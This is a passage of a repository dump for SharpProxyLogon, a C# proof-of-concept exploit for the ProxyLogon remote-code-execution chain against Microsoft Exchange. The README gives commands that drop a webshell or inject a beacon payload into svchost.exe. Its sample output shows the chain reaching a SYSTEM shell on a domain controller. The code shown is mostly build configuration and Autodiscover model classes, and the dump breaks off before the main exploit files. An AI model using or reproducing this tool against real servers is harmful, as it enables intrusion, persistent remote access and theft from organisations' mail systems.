├── .gitignore ├── README.md ├── SharpProxyLogon.sln └── SharpProxyLogon ├── App.config ├── FodyWeavers.xml ├── FodyWeavers.xsd ├── Models ├── AutoDiscoverResp.cs └── GetOABVirutalDirectory.cs ├── Program.cs ├── Properties └── AssemblyInfo.cs ├── SharpProxyLogon.csproj ├── TikiTorch.cs └── packages.config /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.rsuser 8 | *.suo 9 | *.user 10 | *.userosscache 11 | *.sln.docstates 12 | 13 | # User-specific files (MonoDevelop/Xamarin Studio) 14 | *.userprefs 15 | 16 | # Mono auto generated files 17 | mono_crash.* 18 | 19 | # Build results 20 | [Dd]ebug/ 21 | [Dd]ebugPublic/ 22 | [Rr]elease/ 23 | [Rr]eleases/ 24 | x64/ 25 | x86/ 26 | [Aa][Rr][Mm]/ 27 | [Aa][Rr][Mm]64/ 28 | bld/ 29 | [Bb]in/ 30 | [Oo]bj/ 31 | [Ll]og/ 32 | [Ll]ogs/ 33 | 34 | # Visual Studio 2015/2017 cache/options directory 35 | .vs/ 36 | # Uncomment if you have tasks that create the project's static files in wwwroot 37 | #wwwroot/ 38 | 39 | # Visual Studio 2017 auto generated files 40 | Generated\ Files/ 41 | 42 | # MSTest test Results 43 | [Tt]est[Rr]esult*/ 44 | [Bb]uild[Ll]og.* 45 | 46 | # NUnit 47 | *.VisualState.xml 48 | TestResult.xml 49 | nunit-*.xml 50 | 51 | # Build Results of an ATL Project 52 | [Dd]ebugPS/ 53 | [Rr]eleasePS/ 54 | dlldata.c 55 | 56 | # Benchmark Results 57 | BenchmarkDotNet.Artifacts/ 58 | 59 | # .NET Core 60 | project.lock.json 61 | project.fragment.lock.json 62 | artifacts/ 63 | 64 | # StyleCop 65 | StyleCopReport.xml 66 | 67 | # Files built by Visual Studio 68 | *_i.c 69 | *_p.c 70 | *_h.h 71 | *.ilk 72 | *.meta 73 | *.obj 74 | *.iobj 75 | *.pch 76 | *.pdb 77 | *.ipdb 78 | *.pgc 79 | *.pgd 80 | *.rsp 81 | *.sbr 82 | *.tlb 83 | *.tli 84 | *.tlh 85 | *.tmp 86 | *.tmp_proj 87 | *_wpftmp.csproj 88 | *.log 89 | *.vspscc 90 | *.vssscc 91 | .builds 92 | *.pidb 93 | *.svclog 94 | *.scc 95 | 96 | # Chutzpah Test files 97 | _Chutzpah* 98 | 99 | # Visual C++ cache files 100 | ipch/ 101 | *.aps 102 | *.ncb 103 | *.opendb 104 | *.opensdf 105 | *.sdf 106 | *.cachefile 107 | *.VC.db 108 | *.VC.VC.opendb 109 | 110 | # Visual Studio profiler 111 | *.psess 112 | *.vsp 113 | *.vspx 114 | *.sap 115 | 116 | # Visual Studio Trace Files 117 | *.e2e 118 | 119 | # TFS 2012 Local Workspace 120 | $tf/ 121 | 122 | # Guidance Automation Toolkit 123 | *.gpState 124 | 125 | # ReSharper is a .NET coding add-in 126 | _ReSharper*/ 127 | *.[Rr]e[Ss]harper 128 | *.DotSettings.user 129 | 130 | # TeamCity is a build add-in 131 | _TeamCity* 132 | 133 | # DotCover is a Code Coverage Tool 134 | *.dotCover 135 | 136 | # AxoCover is a Code Coverage Tool 137 | .axoCover/* 138 | !.axoCover/settings.json 139 | 140 | # Visual Studio code coverage results 141 | *.coverage 142 | *.coveragexml 143 | 144 | # NCrunch 145 | _NCrunch_* 146 | .*crunch*.local.xml 147 | nCrunchTemp_* 148 | 149 | # MightyMoose 150 | *.mm.* 151 | AutoTest.Net/ 152 | 153 | # Web workbench (sass) 154 | .sass-cache/ 155 | 156 | # Installshield output folder 157 | [Ee]xpress/ 158 | 159 | # DocProject is a documentation generator add-in 160 | DocProject/buildhelp/ 161 | DocProject/Help/*.HxT 162 | DocProject/Help/*.HxC 163 | DocProject/Help/*.hhc 164 | DocProject/Help/*.hhk 165 | DocProject/Help/*.hhp 166 | DocProject/Help/Html2 167 | DocProject/Help/html 168 | 169 | # Click-Once directory 170 | publish/ 171 | 172 | # Publish Web Output 173 | *.[Pp]ublish.xml 174 | *.azurePubxml 175 | # Note: Comment the next line if you want to checkin your web deploy settings, 176 | # but database connection strings (with potential passwords) will be unencrypted 177 | *.pubxml 178 | *.publishproj 179 | 180 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 181 | # checkin your Azure Web App publish settings, but sensitive information contained 182 | # in these scripts will be unencrypted 183 | PublishScripts/ 184 | 185 | # NuGet Packages 186 | *.nupkg 187 | # NuGet Symbol Packages 188 | *.snupkg 189 | # The packages folder can be ignored because of Package Restore 190 | **/[Pp]ackages/* 191 | # except build/, which is used as an MSBuild target. 192 | !**/[Pp]ackages/build/ 193 | # Uncomment if necessary however generally it will be regenerated when needed 194 | #!**/[Pp]ackages/repositories.config 195 | # NuGet v3's project.json files produces more ignorable files 196 | *.nuget.props 197 | *.nuget.targets 198 | 199 | # Microsoft Azure Build Output 200 | csx/ 201 | *.build.csdef 202 | 203 | # Microsoft Azure Emulator 204 | ecf/ 205 | rcf/ 206 | 207 | # Windows Store app package directories and files 208 | AppPackages/ 209 | BundleArtifacts/ 210 | Package.StoreAssociation.xml 211 | _pkginfo.txt 212 | *.appx 213 | *.appxbundle 214 | *.appxupload 215 | 216 | # Visual Studio cache files 217 | # files ending in .cache can be ignored 218 | *.[Cc]ache 219 | # but keep track of directories ending in .cache 220 | !?*.[Cc]ache/ 221 | 222 | # Others 223 | ClientBin/ 224 | ~$* 225 | *~ 226 | *.dbmdl 227 | *.dbproj.schemaview 228 | *.jfm 229 | *.pfx 230 | *.publishsettings 231 | orleans.codegen.cs 232 | 233 | # Including strong name files can present a security risk 234 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 235 | #*.snk 236 | 237 | # Since there are multiple workflows, uncomment next line to ignore bower_components 238 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 239 | #bower_components/ 240 | 241 | # RIA/Silverlight projects 242 | Generated_Code/ 243 | 244 | # Backup & report files from converting an old project file 245 | # to a newer Visual Studio version. Backup files are not needed, 246 | # because we have git ;-) 247 | _UpgradeReport_Files/ 248 | Backup*/ 249 | UpgradeLog*.XML 250 | UpgradeLog*.htm 251 | ServiceFabricBackup/ 252 | *.rptproj.bak 253 | 254 | # SQL Server files 255 | *.mdf 256 | *.ldf 257 | *.ndf 258 | 259 | # Business Intelligence projects 260 | *.rdl.data 261 | *.bim.layout 262 | *.bim_*.settings 263 | *.rptproj.rsuser 264 | *- [Bb]ackup.rdl 265 | *- [Bb]ackup ([0-9]).rdl 266 | *- [Bb]ackup ([0-9][0-9]).rdl 267 | 268 | # Microsoft Fakes 269 | FakesAssemblies/ 270 | 271 | # GhostDoc plugin setting file 272 | *.GhostDoc.xml 273 | 274 | # Node.js Tools for Visual Studio 275 | .ntvs_analysis.dat 276 | node_modules/ 277 | 278 | # Visual Studio 6 build log 279 | *.plg 280 | 281 | # Visual Studio 6 workspace options file 282 | *.opt 283 | 284 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 285 | *.vbw 286 | 287 | # Visual Studio LightSwitch build output 288 | **/*.HTMLClient/GeneratedArtifacts 289 | **/*.DesktopClient/GeneratedArtifacts 290 | **/*.DesktopClient/ModelManifest.xml 291 | **/*.Server/GeneratedArtifacts 292 | **/*.Server/ModelManifest.xml 293 | _Pvt_Extensions 294 | 295 | # Paket dependency manager 296 | .paket/paket.exe 297 | paket-files/ 298 | 299 | # FAKE - F# Make 300 | .fake/ 301 | 302 | # CodeRush personal settings 303 | .cr/personal 304 | 305 | # Python Tools for Visual Studio (PTVS) 306 | __pycache__/ 307 | *.pyc 308 | 309 | # Cake - Uncomment if you are using it 310 | # tools/** 311 | # !tools/packages.config 312 | 313 | # Tabs Studio 314 | *.tss 315 | 316 | # Telerik's JustMock configuration file 317 | *.jmconfig 318 | 319 | # BizTalk build output 320 | *.btp.cs 321 | *.btm.cs 322 | *.odx.cs 323 | *.xsd.cs 324 | 325 | # OpenCover UI analysis results 326 | OpenCover/ 327 | 328 | # Azure Stream Analytics local run output 329 | ASALocalRun/ 330 | 331 | # MSBuild Binary and Structured Log 332 | *.binlog 333 | 334 | # NVidia Nsight GPU debugger configuration file 335 | *.nvuser 336 | 337 | # MFractors (Xamarin productivity tool) working folder 338 | .mfractor/ 339 | 340 | # Local History for Visual Studio 341 | .localhistory/ 342 | 343 | # BeatPulse healthcheck temp database 344 | healthchecksdb 345 | 346 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 347 | MigrationBackup/ 348 | 349 | # Ionide (cross platform F# VS Code tools) working folder 350 | .ionide/ 351 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # SharpProxyLogon 2 | 3 | C# POC for the ProxyLogon chained RCE 4 | 5 | ``` 6 | __ _ ___ __ 7 | / _\ |__ __ _ _ __ _ __ / _ \_ __ _____ ___ _ / / ___ __ _ ___ _ __ 8 | \ \| '_ \ / _` | '__| '_ \ / /_)/ '__/ _ \ \/ / | | |/ / / _ \ / _` |/ _ \| '_ \ 9 | _\ \ | | | (_| | | | |_) / ___/| | | (_) > <| |_| / /__| (_) | (_| | (_) | | | | 10 | \__/_| |_|\__,_|_| | .__/\/ |_| \___/_/\_\\__, \____/\___/ \__, |\___/|_| |_| 11 | |_| |___/ |___/ 12 | @Flangvik 13 | 14 | Usage Shell: SharpProxyLogon.exe 15 | Usage x64 injection: SharpProxyLogon.exe 16 | ``` 17 | 18 | Shellcode injection uses built-in [TikiTorch stub by @Rastamouse](https://github.com/rasta-mouse/TikiTorch), this will spawn, suspend and inject staged_beacon.bin into svchost.exe 19 | 20 | ``` 21 | SharpProxyLogon.exe 192.168.58.111:443 administrator@legitcorp.net C:\Temp\staged_beacon.bin "C:\Windows\System32\svchost.exe" 22 | 23 | __ _ ___ __ 24 | / _\ |__ __ _ _ __ _ __ / _ \_ __ _____ ___ _ / / ___ __ _ ___ _ __ 25 | \ \| '_ \ / _` | '__| '_ \ / /_)/ '__/ _ \ \/ / | | |/ / / _ \ / _` |/ _ \| '_ \ 26 | _\ \ | | | (_| | | | |_) / ___/| | | (_) > <| |_| / /__| (_) | (_| | (_) | | | | 27 | \__/_| |_|\__,_|_| | .__/\/ |_| \___/_/\_\\__, \____/\___/ \__, |\___/|_| |_| 28 | |_| |___/ |___/ 29 | @Flangvik 30 | 31 | Usage Shell: SharpProxyLogon.exe 32 | Usage x64 injection: SharpProxyLogon.exe 33 | [+] Got hostname DC01 34 | [+] Got legacyDN /o=LEGITCORP/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=ae2513b106f343ab8c465ec254b105c6-Administrator 35 | [+] Got mailBoxId 7844b192-ae6a-4a16-afe4-269900d5c40a@legitcorp.net 36 | [+] Got accountSID S-1-5-21-2354578447-2549489838-160590685-500 37 | [+] Patched accountSID-> S-1-5-21-2354578447-2549489838-160590685-500 38 | [+] Got msExchEcpCanary lR_xIbkU4EeRa8k0G_ekSjy7CrzM9dgIeCdYK8sMbRQMUoAQMnEfYvHrvDLT1j2jJMFBrpxnJ1s. 39 | [+] Got aspNETSessionID 0e8da60d-ff97-4748-80f1-5834caeba361 40 | [+] Got OABId 1d2e2d98-c636-43c7-a3a9-8041b545d575 41 | [+] Setting ExternalUrl... 42 | [+] Triggering ResetOABVirtualDirectory... 43 | [+] Shell should have landed, triggering injection 44 | ``` 45 | 46 | Example with classic webshell drop 47 | ``` 48 | SharpProxyLogon.exe 192.168.58.111:443 administrator@legitcorp.net 49 | 50 | __ _ ___ __ 51 | / _\ |__ __ _ _ __ _ __ / _ \_ __ _____ ___ _ / / ___ __ _ ___ _ __ 52 | \ \| '_ \ / _` | '__| '_ \ / /_)/ '__/ _ \ \/ / | | |/ / / _ \ / _` |/ _ \| '_ \ 53 | _\ \ | | | (_| | | | |_) / ___/| | | (_) > <| |_| / /__| (_) | (_| | (_) | | | | 54 | \__/_| |_|\__,_|_| | .__/\/ |_| \___/_/\_\\__, \____/\___/ \__, |\___/|_| |_| 55 | |_| |___/ |___/ 56 | @Flangvik 57 | 58 | Usage Shell: SharpProxyLogon.exe 59 | Usage x64 injection: SharpProxyLogon.exe 60 | [+] Got hostname DC01 61 | [+] Got legacyDN /o=LEGITCORP/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=ae2513b106f343ab8c465ec254b105c6-Administrator 62 | [+] Got mailBoxId 7844b192-ae6a-4a16-afe4-269900d5c40a@legitcorp.net 63 | [+] Got accountSID S-1-5-21-2354578447-2549489838-160590685-500 64 | [+] Patched accountSID-> S-1-5-21-2354578447-2549489838-160590685-500 65 | [+] Got msExchEcpCanary V7mF62VZA0ay793xWTSE07chwKLM9dgIQolVMbEnWJJkvonIUO8VWm2BZdIklFP35W-mtZnUZ4Y. 66 | [+] Got aspNETSessionID 9028e0b3-e56c-4b33-b0e9-b66ab9ab9067 67 | [+] Got OABId cabf9619-178d-4d3e-84a3-748ec598a477 68 | [+] Setting ExternalUrl... 69 | [+] Triggering ResetOABVirtualDirectory... 70 | [+] Shell should have landed, going semi-interactive 71 | CMD #>whoami 72 | nt authority\system 73 | 74 | CMD #>hostname 75 | DC01 76 | 77 | CMD #>ipconfig 78 | 79 | Windows IP Configuration 80 | 81 | 82 | Ethernet adapter Ethernet0: 83 | 84 | Connection-specific DNS Suffix . : 85 | Link-local IPv6 Address . . . . . : fe80::2598:cc98:d369:b6ed%13 86 | IPv4 Address. . . . . . . . . . . : 192.168.58.111 87 | Subnet Mask . . . . . . . . . . . : 255.255.255.0 88 | Default Gateway . . . . . . . . . : 192.168.58.2 89 | 90 | CMD #> 91 | ``` -------------------------------------------------------------------------------- /SharpProxyLogon.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.31019.35 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpProxyLogon", "SharpProxyLogon\SharpProxyLogon.csproj", "{A84CB573-3030-4E3B-8381-B02246EBBF0A}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Debug|x64 = Debug|x64 12 | Release|Any CPU = Release|Any CPU 13 | Release|x64 = Release|x64 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {A84CB573-3030-4E3B-8381-B02246EBBF0A}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 17 | {A84CB573-3030-4E3B-8381-B02246EBBF0A}.Debug|Any CPU.Build.0 = Debug|Any CPU 18 | {A84CB573-3030-4E3B-8381-B02246EBBF0A}.Debug|x64.ActiveCfg = Release|x64 19 | {A84CB573-3030-4E3B-8381-B02246EBBF0A}.Debug|x64.Build.0 = Release|x64 20 | {A84CB573-3030-4E3B-8381-B02246EBBF0A}.Release|Any CPU.ActiveCfg = Release|Any CPU 21 | {A84CB573-3030-4E3B-8381-B02246EBBF0A}.Release|Any CPU.Build.0 = Release|Any CPU 22 | {A84CB573-3030-4E3B-8381-B02246EBBF0A}.Release|x64.ActiveCfg = Release|x64 23 | {A84CB573-3030-4E3B-8381-B02246EBBF0A}.Release|x64.Build.0 = Release|x64 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {5DE8ACA0-217B-45E0-8996-E4DAB6A891AB} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /SharpProxyLogon/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /SharpProxyLogon/FodyWeavers.xml: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /SharpProxyLogon/FodyWeavers.xsd: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks 13 | 14 | 15 | 16 | 17 | A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks. 18 | 19 | 20 | 21 | 22 | A list of runtime assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks 23 | 24 | 25 | 26 | 27 | A list of runtime assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks. 28 | 29 | 30 | 31 | 32 | A list of unmanaged 32 bit assembly names to include, delimited with line breaks. 33 | 34 | 35 | 36 | 37 | A list of unmanaged 64 bit assembly names to include, delimited with line breaks. 38 | 39 | 40 | 41 | 42 | The order of preloaded assemblies, delimited with line breaks. 43 | 44 | 45 | 46 | 47 | 48 | This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file. 49 | 50 | 51 | 52 | 53 | Controls if .pdbs for reference assemblies are also embedded. 54 | 55 | 56 | 57 | 58 | Controls if runtime assemblies are also embedded. 59 | 60 | 61 | 62 | 63 | Controls whether the runtime assemblies are embedded with their full path or only with their assembly name. 64 | 65 | 66 | 67 | 68 | Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option. 69 | 70 | 71 | 72 | 73 | As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off. 74 | 75 | 76 | 77 | 78 | Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code. 79 | 80 | 81 | 82 | 83 | Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior. 84 | 85 | 86 | 87 | 88 | A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with | 89 | 90 | 91 | 92 | 93 | A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |. 94 | 95 | 96 | 97 | 98 | A list of runtime assembly names to exclude from the default action of "embed all Copy Local references", delimited with | 99 | 100 | 101 | 102 | 103 | A list of runtime assembly names to include from the default action of "embed all Copy Local references", delimited with |. 104 | 105 | 106 | 107 | 108 | A list of unmanaged 32 bit assembly names to include, delimited with |. 109 | 110 | 111 | 112 | 113 | A list of unmanaged 64 bit assembly names to include, delimited with |. 114 | 115 | 116 | 117 | 118 | The order of preloaded assemblies, delimited with |. 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 'true' to run assembly verification (PEVerify) on the target assembly after all weavers have been executed. 127 | 128 | 129 | 130 | 131 | A comma-separated list of error codes that can be safely ignored in assembly verification. 132 | 133 | 134 | 135 | 136 | 'false' to turn off automatic generation of the XML Schema file. 137 | 138 | 139 | 140 | 141 | -------------------------------------------------------------------------------- /SharpProxyLogon/Models/AutoDiscoverResp.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | 7 | namespace SharpProxyLogon.Models 8 | { 9 | 10 | 11 | // NOTE: Generated code may require at least .NET Framework 4.5 or .NET Core/Standard 2.0. 12 | /// 13 | [System.SerializableAttribute()] 14 | [System.ComponentModel.DesignerCategoryAttribute("code")] 15 | [System.Xml.Serialization.XmlTypeAttribute(AnonymousType = true, Namespace = "http://schemas.microsoft.com/exchange/autodiscover/responseschema/2006")] 16 | [System.Xml.Serialization.XmlRootAttribute(Namespace = "http://schemas.microsoft.com/exchange/autodiscover/responseschema/2006", IsNullable = false)] 17 | public partial class Autodiscover 18 | { 19 | 20 | private Response responseField; 21 | 22 | /// 23 | [System.Xml.Serialization.XmlElementAttribute(Namespace = "http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a")] 24 | public Response Response 25 | { 26 | get 27 | { 28 | return this.responseField; 29 | } 30 | set 31 | { 32 | this.responseField = value; 33 | } 34 | } 35 | } 36 | 37 | /// 38 | [System.SerializableAttribute()] 39 | [System.ComponentModel.DesignerCategoryAttribute("code")] 40 | [System.Xml.Serialization.XmlTypeAttribute(AnonymousType = true, Namespace = "http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a")] 41 | [System.Xml.Serialization.XmlRootAttribute(Namespace = "http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a", IsNullable = false)] 42 | public partial class Response 43 | { 44 | 45 | private ResponseUser userField; 46 | 47 | private ResponseAccount accountField; 48 | 49 | /// 50 | public ResponseUser User 51 | { 52 | get 53 | { 54 | return this.userField; 55 | } 56 | set 57 | { 58 | this.userField = value; 59 | } 60 | } 61 | 62 | /// 63 | public ResponseAccount Account 64 | { 65 | get 66 | { 67 | return this.accountField; 68 | } 69 | set 70 | { 71 | this.accountField = value; 72 | } 73 | } 74 | } 75 | 76 | /// 77 | [System.SerializableAttribute()] 78 | [System.ComponentModel.DesignerCategoryAttribute("code")] 79 | [System.Xml.Serialization.XmlTypeAttribute(AnonymousType = true, Namespace = "http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a")] 80 | public partial class ResponseUser 81 | { 82 | 83 | private string displayNameField; 84 | 85 | private string legacyDNField; 86 | 87 | private string autoDiscoverSMTPAddressField; 88 | 89 | private string deploymentIdField; 90 | 91 | /// 92 | public string DisplayName 93 | { 94 | get 95 | { 96 | return this.displayNameField; 97 | } 98 | set 99 | { 100 | this.displayNameField = value; 101 | } 102 | } 103 | 104 | /// 105 | public string LegacyDN 106 | { 107 | get 108 | { 109 | return this.legacyDNField; 110 | } 111 | set 112 | { 113 | this.legacyDNField = value; 114 | } 115 | } 116 | 117 | /// 118 | public string AutoDiscoverSMTPAddress 119 | { 120 | get 121 | { 122 | return this.autoDiscoverSMTPAddressField; 123 | } 124 | set 125 | { 126 | this.autoDiscoverSMTPAddressField = value; 127 | } 128 | } 129 | 130 | /// 131 | public string DeploymentId 132 | { 133 | get 134 | { 135 | return this.deploymentIdField; 136 | } 137 | set 138 | { 139 | this.deploymentIdField = value; 140 | } 141 | } 142 | } 143 | 144 | /// 145 | [System.SerializableAttribute()] 146 | [System.ComponentModel.DesignerCategoryAttribute("code")] 147 | [System.Xml.Serialization.XmlTypeAttribute(AnonymousType = true, Namespace = "http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a")] 148 | public partial class ResponseAccount 149 | { 150 | 151 | private string accountTypeField; 152 | 153 | private string actionField; 154 | 155 | private string microsoftOnlineField; 156 | 157 | private ResponseAccountProtocol[] protocolField; 158 | 159 | /// 160 | public string AccountType 161 | { 162 | get 163 | { 164 | return this.accountTypeField; 165 | } 166 | set 167 | { 168 | this.accountTypeField = value; 169 | } 170 | } 171 | 172 | /// 173 | public string Action 174 | { 175 | get 176 | { 177 | return this.actionField; 178 | } 179 | set 180 | { 181 | this.actionField = value; 182 | } 183 | } 184 | 185 | /// 186 | public string MicrosoftOnline 187 | { 188 | get 189 | { 190 | return this.microsoftOnlineField; 191 | } 192 | set 193 | { 194 | this.microsoftOnlineField = value; 195 | } 196 | } 197 | 198 | /// 199 | [System.Xml.Serialization.XmlElementAttribute("Protocol")] 200 | public ResponseAccountProtocol[] Protocol 201 | { 202 | get 203 | { 204 | return this.protocolField; 205 | } 206 | set 207 | { 208 | this.protocolField = value; 209 | } 210 | } 211 | } 212 | 213 | /// 214 | [System.SerializableAttribute()] 215 | [System.ComponentModel.DesignerCategoryAttribute("code")] 216 | [System.Xml.Serialization.XmlTypeAttribute(AnonymousType = true, Namespace = "http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a")] 217 | public partial class ResponseAccountProtocol 218 | { 219 | 220 | private string typeField; 221 | 222 | private ResponseAccountProtocolInternal internalField; 223 | 224 | private string serverField; 225 | 226 | private string sSLField; 227 | 228 | private string authPackageField; 229 | 230 | private string serverDNField; 231 | 232 | private string serverVersionField; 233 | 234 | private string mdbDNField; 235 | 236 | private string publicFolderServerField; 237 | 238 | private string adField; 239 | 240 | private string aSUrlField; 241 | 242 | private string ewsUrlField; 243 | 244 | private string emwsUrlField; 245 | 246 | private string ecpUrlField; 247 | 248 | private string ecpUrlumField; 249 | 250 | private string ecpUrlaggrField; 251 | 252 | private string ecpUrlmtField; 253 | 254 | private string ecpUrlretField; 255 | 256 | private string ecpUrlsmsField; 257 | 258 | private string ecpUrlphotoField; 259 | 260 | private string ecpUrltmField; 261 | 262 | private string ecpUrltmCreatingField; 263 | 264 | private string ecpUrltmEditingField; 265 | 266 | private string ecpUrlextinstallField; 267 | 268 | private string oOFUrlField; 269 | 270 | private string uMUrlField; 271 | 272 | private string oABUrlField; 273 | 274 | private string serverExclusiveConnectField; 275 | 276 | private string certPrincipalNameField; 277 | 278 | private string groupingInformationField; 279 | 280 | /// 281 | public string Type 282 | { 283 | get 284 | { 285 | return this.typeField; 286 | } 287 | set 288 | { 289 | this.typeField = value; 290 | } 291 | } 292 | 293 | /// 294 | public ResponseAccountProtocolInternal Internal 295 | { 296 | get 297 | { 298 | return this.internalField; 299 | } 300 | set 301 | { 302 | this.internalField = value; 303 | } 304 | } 305 | 306 | /// 307 | public string Server 308 | { 309 | get 310 | { 311 | return this.serverField; 312 | } 313 | set 314 | { 315 | this.serverField = value; 316 | } 317 | } 318 | 319 | /// 320 | public string SSL 321 | { 322 | get 323 | { 324 | return this.sSLField; 325 | } 326 | set 327 | { 328 | this.sSLField = value; 329 | } 330 | } 331 | 332 | /// 333 | public string AuthPackage 334 | { 335 | get 336 | { 337 | return this.authPackageField; 338 | } 339 | set 340 | { 341 | this.authPackageField = value; 342 | } 343 | } 344 | 345 | /// 346 | public string ServerDN 347 | { 348 | get 349 | { 350 | return this.serverDNField; 351 | } 352 | set 353 | { 354 | this.serverDNField = value; 355 | } 356 | } 357 | 358 | /// 359 | public string ServerVersion 360 | { 361 | get 362 | { 363 | return this.serverVersionField; 364 | } 365 | set 366 | { 367 | this.serverVersionField = value; 368 | } 369 | } 370 | 371 | /// 372 | public string MdbDN 373 | { 374 | get 375 | { 376 | return this.mdbDNField; 377 | } 378 | set 379 | { 380 | this.mdbDNField = value; 381 | } 382 | } 383 | 384 | /// 385 | public string PublicFolderServer 386 | { 387 | get 388 | { 389 | return this.publicFolderServerField; 390 | } 391 | set 392 | { 393 | this.publicFolderServerField = value; 394 | } 395 | } 396 | 397 | /// 398 | public string AD 399 | { 400 | get 401 | { 402 | return this.adField; 403 | } 404 | set 405 | { 406 | this.adField = value; 407 | } 408 | } 409 | 410 | /// 411 | public string ASUrl 412 | { 413 | get 414 | { 415 | return this.aSUrlField; 416 | } 417 | set 418 | { 419 | this.aSUrlField = value; 420 | } 421 | } 422 | 423 | /// 424 | public string EwsUrl 425 | { 426 | get 427 | { 428 | return this.ewsUrlField; 429 | } 430 | set 431 | { 432 | this.ewsUrlField = value; 433 | } 434 | } 435 | 436 | /// 437 | public string EmwsUrl 438 | { 439 | get 440 | { 441 | return this.emwsUrlField; 442 | } 443 | set 444 | { 445 | this.emwsUrlField = value; 446 | } 447 | } 448 | 449 | /// 450 | public string EcpUrl 451 | { 452 | get 453 | { 454 | return this.ecpUrlField; 455 | } 456 | set 457 | { 458 | this.ecpUrlField = value; 459 | } 460 | } 461 | 462 | /// 463 | [System.Xml.Serialization.XmlElementAttribute("EcpUrl-um")] 464 | public string EcpUrlum 465 | { 466 | get 467 | { 468 | return this.ecpUrlumField; 469 | } 470 | set 471 | { 472 | this.ecpUrlumField = value; 473 | } 474 | } 475 | 476 | /// 477 | [System.Xml.Serialization.XmlElementAttribute("EcpUrl-aggr")] 478 | public string EcpUrlaggr 479 | { 480 | get 481 | { 482 | return this.ecpUrlaggrField; 483 | } 484 | set 485 | { 486 | this.ecpUrlaggrField = value; 487 | } 488 | } 489 | 490 | /// 491 | [System.Xml.Serialization.XmlElementAttribute("EcpUrl-mt")] 492 | public string EcpUrlmt 493 | { 494 | get 495 | { 496 | return this.ecpUrlmtField; 497 | } 498 | set 499 | { 500 | this.ecpUrlmtField = value; 501 | } 502 | } 503 | 504 | /// 505 | [System.Xml.Serialization.XmlElementAttribute("EcpUrl-ret")] 506 | public string EcpUrlret 507 | { 508 | get 509 | { 510 | return this.ecpUrlretField; 511 | } 512 | set 513 | { 514 | this.ecpUrlretField = value; 515 | } 516 | } 517 | 518 | /// 519 | [System.Xml.Serialization.XmlElementAttribute("EcpUrl-sms")] 520 | public string EcpUrlsms 521 | { 522 | get 523 | { 524 | return this.ecpUrlsmsField; 525 | } 526 | set 527 | { 528 | this.ecpUrlsmsField = value; 529 | } 530 | } 531 | 532 | /// 533 | [System.Xml.Serialization.XmlElementAttribute("EcpUrl-photo")] 534 | public string EcpUrlphoto 535 | { 536 | get 537 | { 538 | return this.ecpUrlphotoField; 539 | } 540 | set 541 | { 542 | this.ecpUrlphotoField = value; 543 | } 544 | } 545 | 546 | /// 547 | [System.Xml.Serialization.XmlElementAttribute("EcpUrl-tm")] 548 | public string EcpUrltm 549 | { 550 | get 551 | { 552 | return this.ecpUrltmField; 553 | } 554 | set 555 | { 556 | this.ecpUrltmField = value; 557 | } 558 | } 559 | 560 | /// 561 | [System.Xml.Serialization.XmlElementAttribute("EcpUrl-tmCreating")] 562 | public string EcpUrltmCreating 563 | { 564 | get 565 | { 566 | return this.ecpUrltmCreatingField; 567 | } 568 | set 569 | { 570 | this.ecpUrltmCreatingField = value; 571 | } 572 | } 573 | 574 | /// 575 | [System.Xml.Serialization.XmlElementAttribute("EcpUrl-tmEditing")] 576 | public string EcpUrltmEditing 577 | { 578 | get 579 | { 580 | return this.ecpUrltmEditingField; 581 | } 582 | set 583 